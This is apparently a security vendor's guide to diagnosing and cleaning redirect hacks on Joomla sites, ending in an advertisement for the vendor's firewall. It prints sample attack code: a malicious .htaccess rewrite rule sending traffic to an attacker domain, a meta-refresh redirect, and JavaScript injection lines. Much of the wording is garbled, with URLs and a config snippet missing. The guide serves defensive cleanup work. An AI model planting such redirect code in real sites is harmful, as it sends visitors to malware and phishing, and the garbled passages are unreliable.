Fixing Malicious Redirects in Joomla Website

Remove Malware

Joomla makes it easier to manage a website on a day-to-day basis. This CMS is user-friendly and is powered by the open source community. Joomla is extremely popular because of the large number of extensions available. Joomla has been hit by a slew of security flaws this year. These include Joomla XSS, File incursion, and SQL injection, among others. These flaws attract attackers who want to profit by exploiting them.

Patches are released early by developers, but it takes time for users to upgrade. As a result, a huge number of Joomla installations are vulnerable to attacks. The Joomla site is in the hands of the attacker after it has been hacked. It can be defaced or destroyed, or a Joomla redirect hack can be used by the attacker. The use of a Joomla redirect hack is extremely prevalent because it allows attackers to collect clicks. The Joomla redirect exploit also aids spammers in their efforts. Joomla Web Security, according to the book.

Joomla Redirect Hack: Symptoms

It’s not always easy to spot a Joomla redirect hack. For a long time, the web administrator may be ignorant. He or she may only be contacted if some users complain about being directed away from the website. The following are some of the most prevalent signs that your site has been hacked by Joomla virus redirects:

  • Users are led to URLs that they are unfamiliar with.
  • Visitors are served fake marketing sites.
  • The site may attempt to infect the user’s device with malware.
  • It’s possible that the site will be blacklisted for serving spam.
  • On the site, there are fake phishing pages. Particularly on payment pages.
  • Multiple pop-ups may display one after the other.

Joomla Hacked Redirect: Examples

The Joomla malware reroute is perplexing webmasters all over the internet. Frequently, the first response is to seek assistance from the Joomla community forums. Even after cleansing, the Joomla redirect hack can reappear.

Joomla Redirect Hack: Causes

DNS Hijacking

DNS hijacking has major consequences. DNS Hijacking attempts have harmed major corporations such as Wikileaks. An attacker can use this approach to redirect all visitors to your Joomla site. Large corporations, in particular, must keep their DNS servers secure. DNS hijacking can be carried out in two ways:

  • Hosts.txt File Tampering: Each machine has its own Hosts.txt file. This file aids them in translating hostnames to IP addresses. A large-scale malware assault can mess with a computer’s hosts file. Instead of redirecting to your Joomla site, these machines would go to the attacker-controlled domain. As a result, a Joomla virus redirect is carried out.
  • Attacking the DNS Server: Because DNS is an outdated protocol, the entire system is based on trust. Slave and master servers are used to communicate with the DNS server.
  • Upon request, the master sends zones to the slave servers. DNS zones are essentially duplicates of the local database. This contains sensitive information about the machines that may not be searchable by the general public.
  • As a result, the attacker creates a rogue slave server and copies the zone. Using this information, the attacker attempts to infiltrate the network by attacking susceptible machines.
  • Additionally, the attacker can interfere with the local DNS server. As a result, all queries are forwarded to the attacker-controlled machine. As a result, you’ve successfully completed a Joomla redirect hack!

Furthermore, similar attacks can be carried out on a LAN network as well as on public wifi. A phoney DNS proxy could be set up by the attacker. This would connect your Joomla site’s IP address to the attacker-controlled machine. As a result, all local users are sent to the bogus Joomla site. As a result, you’ve completed a Joomla redirect hack!

SQL Injection

Joomla was proven to be vulnerable to a number of SQLi attacks earlier this year. CVE-2018-8045 was assigned to the component that was susceptible in one of them: User Notes list view. An attacker could use this issue to run SQL commands on the server. As a result, the database’s sensitive tables were exposed. The dashboard can then be compromised using the login information received from here. An attacker might use the Dashboard to infect each file with Javascript code, causing redirection. Attackers frequently try to automate this procedure by uploading programmes that perform this function. The attacker could introduce Joomla compromised redirects into existing files or generate new ones. The following are some of the most regularly used viral files to produce Joomla hacked redirects:

  • /uuc/news id.php
  • /zkd/news fx.php
  • /dgmq/w news.php
  • /cisc/br-news.php

If you find any such files, delete them immediately. The malicious redirect code would be present in each of these files. This is what it would look like:

<meta http-equiv=”refresh” content=”2;

url= “>. The Meta tags are used to redirect users to certain files. is redirected to the visitors. It’s worth noting that the Joomla site can be vulnerable to Stacked Based SQLi at times. The attacker now has the ability to run system commands. As a result, the attacker can only use SQL statements to infect the files with malicious redirect code!

Cross Site Scripting

When it comes to common vulnerabilities, XSS is SQLi’s best friend. This year, Joomla was found to have a slew of XSS vulnerabilities. CVE-2018-15880, CVE-2018-12711, CVE-2018-11328, and CVE-2018-11326 are among them. CVE-2018-12711 was the most serious of the bunch. A defective ‘language changer module‘ was to blame for this. This allowed JS to contaminate the URLs of some languages. Aside from redirecting Joomla malware, an attacker can use XSS to accomplish other attacks such as cookie theft.


When injected after the susceptible argument, this code can redirect users. Users are led to, which loads a malicious scriptbad.js. Depending on the attacker’s motivation, scriptbad.js can perform a variety of Javascript activities. Aside from creating Joomla redirect hacks, the attacker can use an XSS to lead victims to phishing pages.

Javascript Injection

Javascript is a sophisticated language that is frequently used to do dynamic tasks. Joomla is vulnerable to a Javascript injection due to some extension authors’ lack of safe development techniques. Javascript injection, like XSS, can be used to carry out Joomla hacked redirects. It is possible to perform a heuristic test for Javascript injection. Type: in the address bar of the website you’re visiting:

javascript:alert(‘Hello World!’);

The site is susceptible if it shows a message box that says “Hello World!” The attacker can now manipulate the site in a variety of ways. For example, the attacker could insert false URLs into a form field.

javascript:void(document.forms[0].redirect01.value=””) The is appended to the input namedredirect01 in this piece of code. As a result, the field now contains a link to the phoney website. It’s worth noting that, like Reflected XSS, this attack is carried out online on a local system. As a result, the attacker would have to rely on other Social Engineering approaches to deceive remote users.

.htaccess File

.htaccess is a highly powerful file that can do a lot of things. It is frequently used to establish redirects in addition to blocking a few forms of script injection attacks. In the event of a Joomla redirection hack, the.htaccess file would be infected with the following code:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteRule .* http://MaliciousDomain.tld/redirect.php?t=3 [R,L]

This code snippet’s final line leads users toMaliciousDomain. The scriptredirect.php file is used to accomplish this. In addition to.htacces, files like index.php are frequently contaminated. Because index.php is the first page a user sees, it receives a substantial quantity of traffic. As a result, the attacker attempted to breach index.php in order to reroute as much traffic as possible. As a result of the misdirected traffic, the attacker is able to collect clicks.

Joomla Redirect Hack: Fixes

Secure the DNS Server

Reduce the number of zones sent to a bare minimum. Set up all of the slave DNS servers ahead of time so that no rogue slave can request zone transfer. Thenamed.conf.local file can be edited to accomplish this.
The slave DNS servers, i.e.secundario01, are predefined in this piece of code. As a result, only trusted servers are allowed to switch zones. DNS servers are sometimes exploited in data exfiltration attacks. As a result, keep an eye on data packets as they move through DNS servers in real time. Wireshark, for example, is a useful tool for this.

Clean the Database

It is difficult to detect the code responsible for the Joomla redirect hack when it is concealed within core files. Despite the fact that all of the infected files have anything in common. This is the malicious code that causes redirects. Using a database admin tool like PhpMyAdmin, all of these files may be searched in one click.

PhpMyAdmin includes a search option that aids in detection. This tool can search for all the pages/posts containing the malicious scripthxxp:/maliciousSITE[.]com/bad.php in their code. Aside from that, the tool can be utilised to:

  • Look for any new administrators and remove them.
  • The database password has been reset.
  • Getting rid of the contaminated tables.
  • If the database has been damaged by the attacker, the modifications will be rolled back.

Third Party Advertisements

Webmasters frequently enable third-party advertisements on their sites in order to generate cash. However, some ad networks do not follow the rules. Because of the laxity with which ad material is served, malevolent gamers can inject redirect code into the advertising. Furthermore, the majority of malicious scripts are housed on the other server, thus complicating the situation. If the infection keeps reappearing after cleaning, consider blocking the advertising. If the Joomla redirect hack ceases, it’s most likely because of malicious adverts on the site. As a result, contact the ad network to rectify the problem.

Other Safety Measures

  • The changelog can be used to verify if updates contain important security fixes. As a result, you should update Joomla on a regular basis to maintain it secure.
  • Only use well-known extensions. Null or badly coded extensions should be avoided.
  • Keep your extensions up to date in addition to your core files.
  • A brute force assault can be mitigated by using secure credentials.
  • Secure the server’s file permissions. Ensure that permission for files like .htaccessis set to444 (r–r–r–) or440 (r–r—–).
  • Log in through SSH if you suspect a file alteration. On the terminal, execute the following commandfind /path-of-www -type f -printf ‘%TY-%Tm-%Td %TT %pn’ | sort -r. The result would be a list of files that have been modified according to their timestamps. Manually inspect the files from here on out. Using the character ‘#,’ comment out the questionable lines of code. Then, for a file review, consult the specialists!


It’s critical to avoid a recurrence of the Joomla redirection hack. However, the site may be regularly targeted by hackers. A firewall is the most effective defence strategy in this situation. Integrating a firewall is simple and straightforward. The majority of security solutions on the market today are scalable. Like the one at Astra, which is suitable for both small blogs and major ecommerce websites. Furthermore, if a file is updated, Astra sends an email to the users.


When it comes to preventing Joomla virus redirects, Astra has a proven track record. Furthermore, Astra’s packet filtering ensures that no malicious requests from attackers impact your site. Astra also performs a security assessment on your Joomla site and tells you if any vulnerabilities are discovered. As a result, you’ll always be one step ahead of the assailants. Astra is highly recommended to block Joomla redirect hack since it is an ideal blend of human help and automation.